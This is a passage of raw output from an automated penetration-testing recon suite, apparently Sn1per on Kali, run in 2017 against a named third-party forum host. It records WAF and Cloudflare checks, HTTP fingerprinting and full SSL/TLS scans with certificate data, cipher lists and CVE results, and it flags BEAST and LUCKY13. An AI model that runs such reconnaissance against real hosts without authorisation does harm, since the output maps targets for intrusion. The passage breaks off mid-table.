1605[1;37m[ INFO ] [ Shutting down ][0m
1606[1;37m[ INFO ] [ End of process INURLBR at [30-11-2017 00:28:05][0m
1607[1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
1608[1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-pedoforums.omgforum.net.txt ][0m
1609[1;37m|_________________________________________________________________________________________[0m
1610
1611[1;37m\_________________________________________________________________________________________/[0m
1612
1613[91m + -- --=[Port 110 closed... skipping.[0m
1614[91m + -- --=[Port 111 closed... skipping.[0m
1615[91m + -- --=[Port 135 closed... skipping.[0m
1616[91m + -- --=[Port 139 closed... skipping.[0m
1617[91m + -- --=[Port 161 closed... skipping.[0m
1618[91m + -- --=[Port 162 closed... skipping.[0m
1619[91m + -- --=[Port 389 closed... skipping.[0m
1620[93m + -- --=[Port 443 opened... running tests...[0m
1621[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
1622
1623 ^ ^
1624 _ __ _ ____ _ __ _ _ ____
1625 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1626 | V V // o // _/ | V V // 0 // 0 // _/
1627 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1628 <
1629 ...'
1630
1631 WAFW00F - Web Application Firewall Detection Tool
1632
1633 By Sandro Gauci && Wendel G. Henrique
1634
1635Checking https://pedoforums.omgforum.net
1636
1637[92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
1638 ____ _ _ _____ _ _
1639 / ___| | ___ _ _ __| | ___|_ _(_) |
1640 | | | |/ _ \| | | |/ _` | |_ / _` | | |
1641 | |___| | (_) | |_| | (_| | _| (_| | | |
1642 \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
1643 v1.0.1 by m0rtem
1644
1645
1646[00:28:17] Initializing CloudFail - the date is: 30/11/2017
1647[00:28:17] Fetching initial information from: pedoforums.omgforum.net...
1648[00:28:25] Server IP: 178.33.44.177
1649[00:28:25] Testing if pedoforums.omgforum.net is on the Cloudflare network...
1650[00:28:25] pedoforums.omgforum.net is not part of the Cloudflare network, quitting...
1651[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
1652[1m[34mhttps://pedoforums.omgforum.net[0m [301 Moved Permanently] [1m[37mCountry[0m[[37mFRANCE[0m][[1m[31mFR[0m], [1m[37mIP[0m[[37m178.33.43.150[0m], [1m[37mRedirectLocation[0m[[37mhttp://pedoforums.omgforum.net/[0m]
1653[1m[34mhttp://pedoforums.omgforum.net/[0m [200 OK] [1m[37mCookies[0m[[37mexadd[0m], [1m[37mCountry[0m[[37mFRANCE[0m][[1m[31mFR[0m], [1m[37mFrame[0m, [1m[37mIP[0m[[37m94.23.73.212[0m], [1m[37mJQuery[0m, [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mOpenSearch[0m[[37m/improvedsearch.xml,https://www.board-directory.net/search/improvedsearch.xml[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFree forum : welcome to pedo forum's![0m], [1m[37mUncommonHeaders[0m[[37mx-content-type-options,access-control-allow-origin[0m], [1m[37mX-XSS-Protection[0m[[37m1; mode=block[0m]
1654
1655[92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
1656
1657
1658
1659 AVAILABLE PLUGINS
1660 -----------------
1661
1662 PluginOpenSSLCipherSuites
1663 PluginSessionResumption
1664 PluginChromeSha1Deprecation
1665 PluginHSTS
1666 PluginHeartbleed
1667 PluginCompression
1668 PluginCertInfo
1669 PluginSessionRenegotiation
1670
1671
1672
1673 CHECKING HOST(S) AVAILABILITY
1674 -----------------------------
1675
1676 pedoforums.omgforum.net:443 => 94.23.150.222:443
1677
1678
1679
1680 SCAN RESULTS FOR PEDOFORUMS.OMGFORUM.NET:443 - 94.23.150.222:443
1681 ----------------------------------------------------------------
1682
1683 * Deflate Compression:
1684 OK - Compression disabled
1685
1686 * Session Renegotiation:
1687 Client-initiated Renegotiations: OK - Rejected
1688 Secure Renegotiation: OK - Supported
1689
1690 * Certificate - Content:
1691 SHA1 Fingerprint: 377db9566d6d36d2d760abcf6cb77d31862b02fa
1692 Common Name: *.forumotion.com
1693 Issuer: AlphaSSL CA - SHA256 - G2
1694 Serial Number: 76AEAF53AC4EA0F66625CCF5
1695 Not Before: Nov 29 13:03:19 2017 GMT
1696 Not After: Dec 30 13:03:19 2018 GMT
1697 Signature Algorithm: sha256WithRSAEncryption
1698 Public Key Algorithm: rsaEncryption
1699 Key Size: 4096 bit
1700 Exponent: 65537 (0x10001)
1701 X509v3 Subject Alternative Name: {'DNS': ['*.forumotion.com', 'forumotion.com']}
1702
1703 * Certificate - Trust:
1704 Hostname Validation: FAILED - Certificate does NOT match pedoforums.omgforum.net
1705 Google CA Store (09/2015): OK - Certificate is trusted
1706 Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: certificate has expired
1707 Microsoft CA Store (09/2015): OK - Certificate is trusted
1708 Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1709 Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1710 Certificate Chain Received: ['*.forumotion.com', 'AlphaSSL CA - SHA256 - G2']
1711
1712 * Certificate - OCSP Stapling:
1713 NOT SUPPORTED - Server did not send back an OCSP response.
1714
1715 * SSLV2 Cipher Suites:
1716 Server rejected all cipher suites.
1717
1718 * SSLV3 Cipher Suites:
1719 Server rejected all cipher suites.
1720
1721 * Session Resumption:
1722 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1723 With TLS Session Tickets: OK - Supported
1724
1725
1726
1727 SCAN COMPLETED IN 16.42 S
1728 -------------------------
1729Version: [32m1.11.10-static[0m
1730OpenSSL 1.0.2-chacha (1.0.2g-dev)
1731[0m
1732Testing SSL server [32mpedoforums.omgforum.net[0m on port [32m443[0m using SNI name [32mpedoforums.omgforum.net[0m
1733
1734 [1;34mTLS Fallback SCSV:[0m
1735Server [32msupports[0m TLS Fallback SCSV
1736
1737 [1;34mTLS renegotiation:[0m
1738[32mSecure[0m session renegotiation supported
1739
1740 [1;34mTLS Compression:[0m
1741Compression [32mdisabled[0m
1742
1743 [1;34mHeartbleed:[0m
1744TLS 1.2 [32mnot vulnerable[0m to heartbleed
1745TLS 1.1 [32mnot vulnerable[0m to heartbleed
1746TLS 1.0 [32mnot vulnerable[0m to heartbleed
1747
1748 [1;34mSupported Server Cipher(s):[0m
1749[32mPreferred[0m TLSv1.2 [32m256[0m bits [32mECDHE-RSA-AES256-GCM-SHA384 [0m Curve P-256 DHE 256
1750Accepted TLSv1.2 [32m128[0m bits [32mECDHE-RSA-AES128-GCM-SHA256 [0m Curve P-256 DHE 256
1751Accepted TLSv1.2 [32m256[0m bits [32mDHE-RSA-AES256-GCM-SHA384 [0m DHE 2048 bits
1752Accepted TLSv1.2 [32m128[0m bits [32mDHE-RSA-AES128-GCM-SHA256 [0m DHE 2048 bits
1753Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1754Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1755Accepted TLSv1.2 [32m256[0m bits DHE-RSA-AES256-SHA256 DHE 2048 bits
1756Accepted TLSv1.2 [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
1757[32mPreferred[0m TLSv1.1 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1758Accepted TLSv1.1 [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
1759[32mPreferred[0m [33mTLSv1.0[0m [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1760Accepted [33mTLSv1.0[0m [32m256[0m bits DHE-RSA-AES256-SHA DHE 2048 bits
1761
1762 [1;34mSSL Certificate:[0m
1763Signature Algorithm: [32msha256WithRSAEncryption[0m
1764RSA Key Strength: [32m4096[0m
1765
1766Subject: *.forumotion.com
1767Altnames: DNS:*.forumotion.com, DNS:forumotion.com
1768Issuer: AlphaSSL CA - SHA256 - G2
1769
1770Not valid before: [32mNov 29 13:03:19 2017 GMT[0m
1771Not valid after: [32mDec 30 13:03:19 2018 GMT[0m
1772[1m
1773###########################################################
1774 testssl 2.9dev from [m[1mhttps://testssl.sh/dev/[m
1775[1m
1776 This program is free software. Distribution and
1777 modification under GPLv2 permitted.
1778 USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
1779
1780 Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
1781[1m
1782###########################################################[m
1783
1784 Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
1785 on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
1786 (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
1787
1788
1789[1mTesting all IPv4 addresses (port 443): [m94.23.73.212 94.23.159.185 94.23.76.111 178.33.44.177 178.33.43.178 178.33.43.150 94.23.150.222 188.165.2.137 178.33.115.32
1790-----------------------------------------------------
1791[7m Start 2017-11-30 00:29:53 -->> 94.23.73.212:443 (pedoforums.omgforum.net) <<--[m
1792
1793 further IP addresses: 178.33.115.32 94.23.159.185 94.23.76.111 178.33.44.177
1794 178.33.43.178 178.33.43.150 94.23.150.222
1795 188.165.2.137
1796 rDNS (94.23.73.212): --
1797 Service detected: HTTP
1798
1799
1800[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
1801
1802[1m SSLv2 [m[1;32mnot offered (OK)[m
1803[1m SSLv3 [m[1;32mnot offered (OK)[m
1804[1m TLS 1 [moffered
1805[1m TLS 1.1 [moffered
1806[1m TLS 1.2 [m[1;32moffered (OK)[m
1807[1m TLS 1.3 [mnot offered
1808[1m SPDY/NPN [mnot offered
1809[1m HTTP2/ALPN [mnot offered
1810
1811[1m[4m Testing ~standard cipher categories [m
1812
1813[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
1814[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
1815[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
1816[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
1817[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
1818[1m Triple DES Ciphers (Medium) [mnot offered (OK)
1819[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
1820[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
1821
1822
1823[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
1824
1825[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
1826 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
1827 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
1828 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
1829 DHE-RSA-AES128-GCM-SHA256
1830[1m Elliptic curves offered: [m[0;32mprime256v1[m
1831
1832
1833[1m[4m Testing server preferences [m
1834
1835[1m Has server cipher order? [m[1;32myes (OK)[m
1836[1m Negotiated protocol [m[1;32mTLSv1.2[m
1837[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
1838[1m Cipher order[m
1839 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
1840 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
1841 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
1842 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
1843 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
1844 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
1845
1846
1847[1m[4m Testing server defaults (Server Hello) [m
1848
1849[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
1850 "EC point formats/#11" "session ticket/#35"
1851 "heartbeat/#15"
1852[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
1853[1m SSL Session ID support [myes
1854[1m Session Resumption [mTickets: yes, ID: yes
1855[1m TLS clock skew[m Random values, no fingerprinting possible
1856[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
1857[1m Server key size [mRSA [0;32m4096[m bits
1858[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
1859 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
1860[1m Common Name (CN) [m[3m*.forumotion.com[m
1861[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
1862[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
1863[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
1864[1m Chain of trust[m [0;32mOk [m[0;35m[m
1865[1m EV cert[m (experimental) no
1866[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
1867[1m # of certificates provided[m 2
1868[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
1869[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
1870[1m OCSP stapling [m[1;33m--[m
1871[1m OCSP must staple [mno
1872[1m DNS CAA RR[m (experimental) [1;33m--[m
1873[1m Certificate Transparency [m[0;32myes[m (certificate extension)
1874
1875
1876[1m[4m Testing HTTP header response @ "/" [m
1877
1878[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
1879[1m HTTP clock skew [m0 sec from localtime
1880[1m Strict Transport Security [m--
1881[1m Public Key Pinning [m--
1882[1m Server banner [m(no "Server" line in header, interesting!)
1883[1m Application banner [m--
1884[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
1885[1m Security headers [m[0;33m--[m
1886[1m Reverse Proxy banner [m--
1887
1888
1889[1m[4m Testing vulnerabilities [m
1890
1891[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
1892[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
1893[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
1894[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
1895[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
1896[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
1897[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
1898[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
1899[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
1900[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
1901[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
1902[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
1903 make sure you don't use this certificate elsewhere with SSLv2 enabled services
1904 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
1905[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
1906 but no DH EXPORT ciphers
1907[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
1908 DHE-RSA-AES256-SHA [m
1909 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
1910[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
1911[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
1912
1913
1914[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
1915
1916Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
1917-----------------------------------------------------------------------------------------------------------------------------
1918 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
1919 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
1920 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
1921 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
1922 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
1923 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
1924 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
1925 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
1926
1927
1928[1m[4m Running client simulations via sockets [m
1929
1930 Android 2.3.7 No connection
1931 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1932 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1933 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1934 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
1935 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
1936 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1937 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1938 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1939 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1940 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1941 IE 6 XP No connection
1942 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1943 IE 8 XP No connection
1944 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1945 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
1946 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
1947 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
1948 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1949 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1950 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1951 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1952 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1953 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
1954 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1955 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1956 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1957 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
1958 Java 6u45 No connection
1959 Java 7u25 No connection
1960 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
1961 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1962 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
1963
1964[7m Done 2017-11-30 00:33:07 [ 206s] -->> 94.23.73.212:443 (pedoforums.omgforum.net) <<--[m
1965
1966-----------------------------------------------------
1967[7m Start 2017-11-30 00:33:09 -->> 94.23.159.185:443 (pedoforums.omgforum.net) <<--[m
1968
1969 further IP addresses: 178.33.115.32 94.23.73.212 94.23.76.111 178.33.44.177
1970 178.33.43.178 178.33.43.150 94.23.150.222
1971 188.165.2.137
1972 rDNS (94.23.159.185): --
1973 Service detected: HTTP
1974
1975
1976[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
1977
1978[1m SSLv2 [m[1;32mnot offered (OK)[m
1979[1m SSLv3 [m[1;32mnot offered (OK)[m
1980[1m TLS 1 [moffered
1981[1m TLS 1.1 [moffered
1982[1m TLS 1.2 [m[1;32moffered (OK)[m
1983[1m TLS 1.3 [mnot offered
1984[1m SPDY/NPN [mnot offered
1985[1m HTTP2/ALPN [mnot offered
1986
1987[1m[4m Testing ~standard cipher categories [m
1988
1989[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
1990[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
1991[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
1992[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
1993[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
1994[1m Triple DES Ciphers (Medium) [mnot offered (OK)
1995[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
1996[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
1997
1998
1999[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2000
2001[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2002 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2003 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2004 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2005 DHE-RSA-AES128-GCM-SHA256
2006[1m Elliptic curves offered: [m[0;32mprime256v1[m
2007
2008
2009[1m[4m Testing server preferences [m
2010
2011[1m Has server cipher order? [m[1;32myes (OK)[m
2012[1m Negotiated protocol [m[1;32mTLSv1.2[m
2013[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2014[1m Cipher order[m
2015 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2016 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2017 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2018 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2019 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2020 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2021
2022
2023[1m[4m Testing server defaults (Server Hello) [m
2024
2025[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2026 "EC point formats/#11" "session ticket/#35"
2027 "heartbeat/#15"
2028[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2029[1m SSL Session ID support [myes
2030[1m Session Resumption [mTickets: yes, ID: yes
2031[1m TLS clock skew[m Random values, no fingerprinting possible
2032[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2033[1m Server key size [mRSA [0;32m4096[m bits
2034[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2035 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2036[1m Common Name (CN) [m[3m*.forumotion.com[m
2037[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2038[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2039[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2040[1m Chain of trust[m [0;32mOk [m[0;35m[m
2041[1m EV cert[m (experimental) no
2042[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2043[1m # of certificates provided[m 2
2044[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2045[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2046[1m OCSP stapling [m[1;33m--[m
2047[1m OCSP must staple [mno
2048[1m DNS CAA RR[m (experimental) [1;33m--[m
2049[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2050
2051
2052[1m[4m Testing HTTP header response @ "/" [m
2053
2054[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2055[1m HTTP clock skew [m0 sec from localtime
2056[1m Strict Transport Security [m--
2057[1m Public Key Pinning [m--
2058[1m Server banner [m(no "Server" line in header, interesting!)
2059[1m Application banner [m--
2060[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2061[1m Security headers [m[0;33m--[m
2062[1m Reverse Proxy banner [m--
2063
2064
2065[1m[4m Testing vulnerabilities [m
2066
2067[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2068[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2069[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2070[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2071[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2072[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2073[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2074[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2075[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2076[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2077[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2078[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2079 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2080 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2081[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2082 but no DH EXPORT ciphers
2083[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2084 DHE-RSA-AES256-SHA [m
2085 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2086[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2087[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2088
2089
2090[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2091
2092Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2093-----------------------------------------------------------------------------------------------------------------------------
2094 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2095 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
